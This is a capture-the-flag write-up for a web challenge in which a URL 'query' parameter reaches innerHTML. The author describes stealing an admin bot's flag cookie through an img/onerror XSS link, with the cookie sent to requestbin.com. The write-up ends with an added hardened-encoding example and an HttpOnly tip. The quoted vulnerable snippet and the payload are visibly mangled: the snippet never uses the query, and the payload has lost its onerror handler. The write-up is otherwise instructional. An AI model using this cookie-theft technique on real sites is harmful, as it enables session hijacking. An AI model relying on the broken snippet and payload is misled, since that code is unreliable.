# Query Service

We can run queries against an SQL server, but we have no information about the
server itself. Queries like `CREATE TABLE mytable (column1 int); INSERT INTO mytable
(column1) VALUES (7); SELECT * FROM mytable;` work without error. The query is
simply appended as a URL parameter in the GET request.

Notice that sending a query triggers a fetch of `sql.db`, which returns a
.db file. The file reveals information about a `notes` table. `SELECT * FROM notes`
reveals:  
```  
submit link to admin bot at http://webp.bcactf.com:49155/  
the flag is in the bot's "flag" cookie  
```

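The page's JavaScript contains the following:  
```typescript  
if (searchParams.get("query")) {  
  // Value taken straight from the URL's "query" parameter  
  let query = searchParams.get("query");  
  // The link markup is assigned as HTML, not as text  
  linkdiv.innerHTML = "Link to this query: (link)";  
}  
```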

This suggests that XSS is possible by sending a malicious "query link" to the
admin.

After tampering with the query parameter for a while and using
https://requestbin.com/, I was able to get the admin cookie with an img tag
and an onerror attribute:  
`CREATE TABLE mytable (column1 int);">![](x)`

Sending the link to the admin reveals the flag on https://requestbin.com/.
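
The sink shown above next to a hardened form, as an added example that is not part of the challenge's code. It assumes the page concatenates the raw `query` value into the `href` of the "(link)" anchor; `BASE`, `SAMPLE` and all function names are hypothetical, and the sample input is a constructed, inert string.

```javascript
// Added example; not the challenge's code. ASSUMPTION: the page concatenates
// the raw "query" parameter into the href of the "(link)" anchor.
const BASE = "http://example.test/"; // constructed placeholder origin

// Vulnerable pattern (assumed): attacker-controlled text becomes markup.
function buildLinkUnsafe(query) {
  return 'Link to this query: <a href="' + BASE + "?query=" + query + '">(link)</a>';
}

// Hardened step 1: let the URL API percent-encode the value for the URL context.
function safeQueryLink(query) {
  const u = new URL(BASE);
  u.searchParams.set("query", query);
  return u.toString();
}

// Hardened step 2 (browser only): build nodes instead of parsing a string as HTML.
// `doc` is the page's document, `linkdiv` the element from the snippet above.
function renderLink(doc, linkdiv, query) {
  const a = doc.createElement("a");
  a.href = safeQueryLink(query); // set as an attribute value, never parsed as markup
  a.textContent = "(link)";
  linkdiv.replaceChildren("Link to this query: ", a);
}

// Rough check for the demo: names of the start tags present in a markup string.
function openedTags(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

// Constructed, inert sample: closes the attribute and opens an extra <b> element.
const SAMPLE = 'SELECT 1;"><b id=injected>';

function demo() {
  const unsafe = openedTags(buildLinkUnsafe(SAMPLE));
  const safe = openedTags('<a href="' + safeQueryLink(SAMPLE) + '">(link)</a>');
  const roundTrip = new URL(safeQueryLink(SAMPLE)).searchParams.get("query");
  return { unsafe, safe, roundTrip };
}

console.log(demo());
```

Setting the `HttpOnly` attribute on the bot's "flag" cookie would additionally keep page script from reading it through `document.cookie`.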